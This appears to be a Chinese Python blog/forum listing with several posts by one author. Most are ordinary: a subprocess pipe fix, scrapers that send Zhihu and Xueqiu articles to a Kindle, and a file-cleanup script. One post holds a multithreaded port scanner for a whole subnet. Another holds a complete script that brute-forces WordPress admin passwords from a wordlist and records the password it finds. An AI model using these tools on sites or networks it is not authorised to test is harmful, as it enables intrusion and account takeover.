回复

李魔佛 发起了问题 • 1 人关注 • 0 个回复 • 4987 次浏览 • 2016-06-16 16:18 • 来自相关话题

subprocess popen 使用PIPE 阻塞进程,导致程序无法继续运行

李魔佛 发表了文章 • 0 个评论 • 8875 次浏览 • 2016-06-12 18:31 • 来自相关话题

 
subprocess用于在python内部创建一个子进程,比如调用shell脚本等。

举例:p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
p.wait()
// hang here
print "finished"

在python的官方文档中对这个进行了解释:http://docs.python.org/2/library/subprocess.html

原因是stdout产生的内容太多,超过了系统的buffer

解决方法是使用communicate()方法。p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
stdout, stderr = p.communicate()
p.wait()
print "Finsih" 查看全部
 
subprocess用于在python内部创建一个子进程,比如调用shell脚本等。

举例:
p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
p.wait()
// hang here
print "finished"


在python的官方文档中对这个进行了解释:http://docs.python.org/2/library/subprocess.html

原因是stdout产生的内容太多,超过了系统的buffer

解决方法是使用communicate()方法。
p = subprocess.Popen(cmd, stdout = subprocess.PIPE, stdin = subprocess.PIPE, shell = True)
stdout, stderr = p.communicate()
p.wait()
print "Finsih"

抓取 知乎日报 中的 大误 系类文章,生成电子书推送到kindle

python爬虫李魔佛 发表了文章 • 0 个评论 • 8803 次浏览 • 2016-06-12 08:52 • 来自相关话题

无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了,大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看的欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 




# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs,sys,datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
filename = filename + ".txt"
f = codecs.open(filename, 'a', encoding='utf-8')
f.write(content)
f.close()


def getPost(date_time, filter_p):
url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
result = re.findall(p, content)
count = -1
row = -1
for i in result:
#print i
return_content = re.findall(filter_p, i)

if return_content:
row = count
break
#print return_content[0]
count = count + 1
#print row
if row == -1:
return 0
link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
link_result = re.findall(link_p, content)[row + 1]
print link_result
result_req = urllib2.Request(link_result, headers=header)
result_resp = urllib2.urlopen(result_req)
#result_content= result_resp.read()
#print result_content

bs = BeautifulSoup(result_resp, "html.parser")
title = bs.title.string.strip()
#print title
filename = re.sub('[\/:*?"<>|]', '-', title)
print filename
print date_time
save2file(filename, title)
save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)

detail_content = bs.find_all('div', class_='content')

for i in detail_content:
#print i
save2file(filename,"\n\n-------------------------answer -------------------------\n\n")
for j in i.strings:

save2file(filename, j)

smtp_server = 'smtp.126.com'
from_mail = sys.argv[1]
password = sys.argv[2]
to_mail = 'xxxxx@kindle.cn'
send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
send_kindle.send_txt(filename)


def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)


date_time = '20160611'
filter_p = re.compile('大误.*')
ori_day=datetime.date(datetime.date.today().year,01,01)
t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)
delta=(t-ori_day).days
print delta
for i in range(delta):
day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)
getPost(day.strftime("%Y%m%d"),filter_p)
#getPost(date_time, filter_p)

if __name__ == "__main__":
main()





github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日) 查看全部
无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了,大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看的欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 

大误.JPG
# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs,sys,datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
filename = filename + ".txt"
f = codecs.open(filename, 'a', encoding='utf-8')
f.write(content)
f.close()


def getPost(date_time, filter_p):
url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
result = re.findall(p, content)
count = -1
row = -1
for i in result:
#print i
return_content = re.findall(filter_p, i)

if return_content:
row = count
break
#print return_content[0]
count = count + 1
#print row
if row == -1:
return 0
link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
link_result = re.findall(link_p, content)[row + 1]
print link_result
result_req = urllib2.Request(link_result, headers=header)
result_resp = urllib2.urlopen(result_req)
#result_content= result_resp.read()
#print result_content

bs = BeautifulSoup(result_resp, "html.parser")
title = bs.title.string.strip()
#print title
filename = re.sub('[\/:*?"<>|]', '-', title)
print filename
print date_time
save2file(filename, title)
save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" %date_time)

detail_content = bs.find_all('div', class_='content')

for i in detail_content:
#print i
save2file(filename,"\n\n-------------------------answer -------------------------\n\n")
for j in i.strings:

save2file(filename, j)

smtp_server = 'smtp.126.com'
from_mail = sys.argv[1]
password = sys.argv[2]
to_mail = 'xxxxx@kindle.cn'
send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
send_kindle.send_txt(filename)


def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)


date_time = '20160611'
filter_p = re.compile('大误.*')
ori_day=datetime.date(datetime.date.today().year,01,01)
t=datetime.date(datetime.date.today().year,datetime.date.today().month,datetime.date.today().day)
delta=(t-ori_day).days
print delta
for i in range(delta):
day=datetime.date(datetime.date.today().year,01,01)+datetime.timedelta(i)
getPost(day.strftime("%Y%m%d"),filter_p)
#getPost(date_time, filter_p)

if __name__ == "__main__":
main()





github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日)

mac os x安装pip?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 4499 次浏览 • 2016-06-10 17:19 • 来自相关话题

python 爆解zip压缩文件密码

李魔佛 发表了文章 • 0 个评论 • 8817 次浏览 • 2016-06-09 21:43 • 来自相关话题

出于对百度网盘的不信任,加上前阵子百度会把一些侵犯版权的文件清理掉或者一些百度认为的尺度过大的文件进行替换,留下一个4秒的教育视频。 为何不提前告诉用户? 擅自把用户的资料删除,以后用户哪敢随意把资料上传上去呢?
 
抱怨归抱怨,由于现在金山快盘,新浪尾盘都关闭了,速度稍微快点的就只有百度网盘了。 所以我会把文件事先压缩好,加个密码然后上传。
 
可是有时候下载下来却忘记了解压密码,实在蛋疼。 所以需要自己逐一验证密码。 所以就写了这个小脚本。 很简单,没啥技术含量。 
 





 
 
代码就用图片吧,大家可以上机自己敲敲代码也好。 ctrl+v 代码 其实会养成一种惰性。
 
github: https://github.com/Rockyzsu/zip_crash
  查看全部
出于对百度网盘的不信任,加上前阵子百度会把一些侵犯版权的文件清理掉或者一些百度认为的尺度过大的文件进行替换,留下一个4秒的教育视频。 为何不提前告诉用户? 擅自把用户的资料删除,以后用户哪敢随意把资料上传上去呢?
 
抱怨归抱怨,由于现在金山快盘,新浪尾盘都关闭了,速度稍微快点的就只有百度网盘了。 所以我会把文件事先压缩好,加个密码然后上传。
 
可是有时候下载下来却忘记了解压密码,实在蛋疼。 所以需要自己逐一验证密码。 所以就写了这个小脚本。 很简单,没啥技术含量。 
 

crash_zip.JPG

 
 
代码就用图片吧,大家可以上机自己敲敲代码也好。 ctrl+v 代码 其实会养成一种惰性。
 
github: https://github.com/Rockyzsu/zip_crash
 

批量删除某个目录下所有子目录的指定后缀的文件

李魔佛 发表了文章 • 0 个评论 • 3921 次浏览 • 2016-06-07 17:51 • 来自相关话题

平时硬盘中下载了大量的image文件,用做刷机。 下载的文件是tgz格式,刷机前需要用 tar zxvf  xxx.tgz 解压。
日积月累,硬盘空间告急,所以写了下面的脚本用来删除指定的解压文件,但是源解压文件不能够删除,因为后续可能会要继续用这个tgz文件的时候(需要再解压然后刷机)。 如果手动去操作,需要进入每一个文件夹,然后选中tgz,然后反选,然后删除。 很费劲。
 
import os

def isContain(des_str,ori_str):
for i in des_str:
if ori_str == i:
return True
return False


path=os.getcwd()
print path
des_str=['img','cfg','bct','bin','sh','dtb','txt','mk','pem','mk','pk8','xml','lib','pl','blob','dat']
for fpath,dirs,fname in os.walk(path):
#print fname

if fname:
for i in fname:
#print i
name=i.split('.')
if len(name)>=2:
#print name[1]
if isContain(des_str,name[1]):
filepath=os.path.join(fpath,i)
print "delete file %s" %filepath
os.remove(filepath)
github: https://github.com/Rockyzsu/RmFile
  查看全部
平时硬盘中下载了大量的image文件,用做刷机。 下载的文件是tgz格式,刷机前需要用 tar zxvf  xxx.tgz 解压。
日积月累,硬盘空间告急,所以写了下面的脚本用来删除指定的解压文件,但是源解压文件不能够删除,因为后续可能会要继续用这个tgz文件的时候(需要再解压然后刷机)。 如果手动去操作,需要进入每一个文件夹,然后选中tgz,然后反选,然后删除。 很费劲。
 
import os

def isContain(des_str,ori_str):
for i in des_str:
if ori_str == i:
return True
return False


path=os.getcwd()
print path
des_str=['img','cfg','bct','bin','sh','dtb','txt','mk','pem','mk','pk8','xml','lib','pl','blob','dat']
for fpath,dirs,fname in os.walk(path):
#print fname

if fname:
for i in fname:
#print i
name=i.split('.')
if len(name)>=2:
#print name[1]
if isContain(des_str,name[1]):
filepath=os.path.join(fpath,i)
print "delete file %s" %filepath
os.remove(filepath)

github: https://github.com/Rockyzsu/RmFile
 

python目录递归?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 5710 次浏览 • 2016-06-07 17:14 • 来自相关话题

git 使用笔记 或者日常使用中易错的地方?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 4840 次浏览 • 2016-06-09 19:02 • 来自相关话题

python雪球爬虫 抓取雪球 大V的所有文章 推送到kindle

python爬虫李魔佛 发表了文章 • 3 个评论 • 20321 次浏览 • 2016-05-29 00:06 • 来自相关话题

30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷的删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容,并保存到本地。也方便自己检索,考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测给删掉,给后来者造成的错觉改大V每次都能精准预测)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 




# -*-coding=utf-8-*-
#抓取雪球的收藏文章
__author__ = 'Rocky'
import requests,cookielib,re,json,time
from toolkit import Toolkit
from lxml import etree
url='https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
'Referer': 'https://xueqiu.com/',
'Origin':'https://xueqiu.com',
'User-Agent': agent}
account=Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data={'username':account['snowball_user'],'password':account['snowball_password']}
s=session.post(url,data=data,headers=headers)
print s.status_code
#print s.text
session.cookies.save()
fav_temp='https://xueqiu.com/favs?page=1'
collection=session.get(fav_temp,headers=headers)
fav_content= collection.text
p=re.compile('"maxPage":(\d+)')
maxPage=p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage=int(maxPage)
print type(maxPage)
for i in range(1,maxPage+1):
fav='https://xueqiu.com/favs?page=%d' %i
collection=session.get(fav,headers=headers)
fav_content= collection.text
#print fav_content
p=re.compile('var favs = {(.*?)};',re.S|re.M)
result=p.findall(fav_content)[0].strip()

new_result='{'+result+'}'
#print type(new_result)
#print new_result
data=json.loads(new_result)
use_data= data['list']
host='https://xueqiu.com'
for i in use_data:
url=host+ i['target']
print url
txt_content=session.get(url,headers=headers).text
#print txt_content.text

tree=etree.HTML(txt_content)
title=tree.xpath('//title/text()')[0]

filename = re.sub('[\/:*?"<>|]', '-', title)
print filename

content=tree.xpath('//div[@class="detail"]')
for i in content:
Toolkit.save2filecn(filename, i.xpath('string(.)'))
#print content
#Toolkit.save2file(filename,)
time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ,会自动登录雪球,然后 在当前目录生产txt文件。
 
github代码:https://github.com/Rockyzsu/xueqiu 查看全部
30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷的删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷的抓取想要的大V发言内容,并保存到本地。也方便自己检索,考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测给删掉,给后来者造成的错觉改大V每次都能精准预测)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 

雪球的爬虫.PNG
# -*-coding=utf-8-*-
#抓取雪球的收藏文章
__author__ = 'Rocky'
import requests,cookielib,re,json,time
from toolkit import Toolkit
from lxml import etree
url='https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
'Referer': 'https://xueqiu.com/',
'Origin':'https://xueqiu.com',
'User-Agent': agent}
account=Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data={'username':account['snowball_user'],'password':account['snowball_password']}
s=session.post(url,data=data,headers=headers)
print s.status_code
#print s.text
session.cookies.save()
fav_temp='https://xueqiu.com/favs?page=1'
collection=session.get(fav_temp,headers=headers)
fav_content= collection.text
p=re.compile('"maxPage":(\d+)')
maxPage=p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage=int(maxPage)
print type(maxPage)
for i in range(1,maxPage+1):
fav='https://xueqiu.com/favs?page=%d' %i
collection=session.get(fav,headers=headers)
fav_content= collection.text
#print fav_content
p=re.compile('var favs = {(.*?)};',re.S|re.M)
result=p.findall(fav_content)[0].strip()

new_result='{'+result+'}'
#print type(new_result)
#print new_result
data=json.loads(new_result)
use_data= data['list']
host='https://xueqiu.com'
for i in use_data:
url=host+ i['target']
print url
txt_content=session.get(url,headers=headers).text
#print txt_content.text

tree=etree.HTML(txt_content)
title=tree.xpath('//title/text()')[0]

filename = re.sub('[\/:*?"<>|]', '-', title)
print filename

content=tree.xpath('//div[@class="detail"]')
for i in content:
Toolkit.save2filecn(filename, i.xpath('string(.)'))
#print content
#Toolkit.save2file(filename,)
time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ,会自动登录雪球,然后 在当前目录生产txt文件。
 
github代码:https://github.com/Rockyzsu/xueqiu

如何快速找到某个模块的帮助或者参数适用 python ?

低调的哥哥 回复了问题 • 2 人关注 • 1 个回复 • 4879 次浏览 • 2016-05-23 23:46 • 来自相关话题

python 多线程扫描开放端口

低调的哥哥 发表了文章 • 0 个评论 • 10181 次浏览 • 2016-05-15 21:15 • 来自相关话题

为什么说python是黑客的语言? 因为很多扫描+破解的任务都可以用python很快的实现,简洁明了。且有大量的库来支持。import socket,sys
import time
from thread_test import MyThread

socket.setdefaulttimeout(1)
#设置每个线程socket的timeou时间,超过1秒没有反应就认为端口不开放
thread_num=4
#线程数目
ip_end=256
ip_start=0
scope=ip_end/thread_num

def scan(ip_head,ip_low, port):
try:
# Alert !!! below statement should be inside scan function. Else each it is one s
ip=ip_head+str(ip_low)
print ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
#通过这一句判断 是否连通
s.close()
print "ip %s port %d open\n" %(ip,port)
return True
except:
return False


def scan_range(ip_head,ip_range,port):
start,end=ip_range
for i in range(start,end):
scan(ip_head,i,port)

if len(sys.argv)<3:
print "input ip and port"
exit()

ip_head=sys.argv[1]
port=int(sys.argv[2])


ip_range=
for i in range(thread_num):
x_range=[i*scope,(i+1)*scope-1]
ip_range.append(x_range)

threads=
for i in range(thread_num):
t=MyThread(scan_range,(ip_head,ip_range,port))
threads.append(t)
for i in range(thread_num):
threads.start()
for i in range(thread_num):
threads.join()
#设置进程阻塞,防止主线程退出了,其他的多线程还在运行

print "*****end*****"多线程的类函数实现: 有一些测试函数在上面没注释或者删除掉,为了让一些初学者更加容易看懂。import thread,threading,time,datetime
from time import sleep,ctime
def loop1():
print "start %s " %ctime()
print "start in loop1"
sleep(3)
print "end %s " %ctime()

def loop2():
print "sart %s " %ctime()
print "start in loop2"
sleep(6)
print "end %s " %ctime()


class MyThread(threading.Thread):
def __init__(self,fun,arg,name=""):
threading.Thread.__init__(self)
self.fun=fun
self.arg=arg
self.name=name
#self.result

def run(self):
self.result=apply(self.fun,self.arg)

def getResult(self):
return self.result

def fib(n):
if n<2:
return 1
else:
return fib(n-1)+fib(n-2)


def sum(n):
if n<2:
return 1
else:
return n+sum(n-1)

def fab(n):
if n<2:
return 1
else:
return n*fab(n-1)

def single_thread():
print fib(12)
print sum(12)
print fab(12)


def multi_thread():
print "in multithread"
fun_list=[fib,sum,fab]
n=len(fun_list)
threads=
count=12
for i in range(n):
t=MyThread(fun_list,(count,),fun_list.__name__)
threads.append(t)
for i in range(n):
threads.start()

for i in range(n):
threads.join()
result= threads.getResult()
print result
def main():
'''
print "start at main"
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2,())
sleep(10)
print "end at main"
'''
start=ctime()
#print "Used %f" %(end-start).seconds
print start
single_thread()
end=ctime()
print end
multi_thread()
#print "used %s" %(end-start).seconds
if __name__=="__main__":
main()
 
最终运行的格式就是  python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器,也就是ssh服务。 
 
github:https://github.com/Rockyzsu/scan_host​ 

  查看全部
为什么说python是黑客的语言? 因为很多扫描+破解的任务都可以用python很快的实现,简洁明了。且有大量的库来支持。
import socket,sys
import time
from thread_test import MyThread

socket.setdefaulttimeout(1)
#设置每个线程socket的timeou时间,超过1秒没有反应就认为端口不开放
thread_num=4
#线程数目
ip_end=256
ip_start=0
scope=ip_end/thread_num

def scan(ip_head,ip_low, port):
try:
# Alert !!! below statement should be inside scan function. Else each it is one s
ip=ip_head+str(ip_low)
print ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
#通过这一句判断 是否连通
s.close()
print "ip %s port %d open\n" %(ip,port)
return True
except:
return False


def scan_range(ip_head,ip_range,port):
start,end=ip_range
for i in range(start,end):
scan(ip_head,i,port)

if len(sys.argv)<3:
print "input ip and port"
exit()

ip_head=sys.argv[1]
port=int(sys.argv[2])


ip_range=
for i in range(thread_num):
x_range=[i*scope,(i+1)*scope-1]
ip_range.append(x_range)

threads=
for i in range(thread_num):
t=MyThread(scan_range,(ip_head,ip_range,port))
threads.append(t)
for i in range(thread_num):
threads.start()
for i in range(thread_num):
threads.join()
#设置进程阻塞,防止主线程退出了,其他的多线程还在运行

print "*****end*****"
多线程的类函数实现: 有一些测试函数在上面没注释或者删除掉,为了让一些初学者更加容易看懂。
import thread,threading,time,datetime
from time import sleep,ctime
def loop1():
print "start %s " %ctime()
print "start in loop1"
sleep(3)
print "end %s " %ctime()

def loop2():
print "sart %s " %ctime()
print "start in loop2"
sleep(6)
print "end %s " %ctime()


class MyThread(threading.Thread):
def __init__(self,fun,arg,name=""):
threading.Thread.__init__(self)
self.fun=fun
self.arg=arg
self.name=name
#self.result

def run(self):
self.result=apply(self.fun,self.arg)

def getResult(self):
return self.result

def fib(n):
if n<2:
return 1
else:
return fib(n-1)+fib(n-2)


def sum(n):
if n<2:
return 1
else:
return n+sum(n-1)

def fab(n):
if n<2:
return 1
else:
return n*fab(n-1)

def single_thread():
print fib(12)
print sum(12)
print fab(12)


def multi_thread():
print "in multithread"
fun_list=[fib,sum,fab]
n=len(fun_list)
threads=
count=12
for i in range(n):
t=MyThread(fun_list,(count,),fun_list.__name__)
threads.append(t)
for i in range(n):
threads.start()

for i in range(n):
threads.join()
result= threads.getResult()
print result
def main():
'''
print "start at main"
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2,())
sleep(10)
print "end at main"
'''
start=ctime()
#print "Used %f" %(end-start).seconds
print start
single_thread()
end=ctime()
print end
multi_thread()
#print "used %s" %(end-start).seconds
if __name__=="__main__":
main()

 
最终运行的格式就是  python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器,也就是ssh服务。 
 
github:https://github.com/Rockyzsu/scan_host​ 

 

python 暴力破解wordpress博客后台登陆密码

python爬虫低调的哥哥 发表了文章 • 0 个评论 • 23818 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都使用的默认,我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,一般用户是使用缺省设置)。
 






所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,怎样安全性会高很多。(其实python也带有一个破解一个验证码的库  - 。-!)# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
def __init__(self, host, username):
#初始化定义 header ,避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件,密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串,如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码, 则这次任务完成,退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"


if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数,为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
  查看全部
自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都使用的默认,我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,一般用户是使用缺省设置)。
 

wordpress后台.PNG


所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,怎样安全性会高很多。(其实python也带有一个破解一个验证码的库  - 。-!)
# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
def __init__(self, host, username):
#初始化定义 header ,避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件,密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串,如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码, 则这次任务完成,退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"


if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数,为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
 

python爬虫 模拟登陆知乎 推送知乎文章到kindle电子书 获取自己的关注问题

python爬虫低调的哥哥 发表了文章 • 0 个评论 • 37740 次浏览 • 2016-05-12 17:53 • 来自相关话题

平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己的关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle











# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
def __init__(self, id):

# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
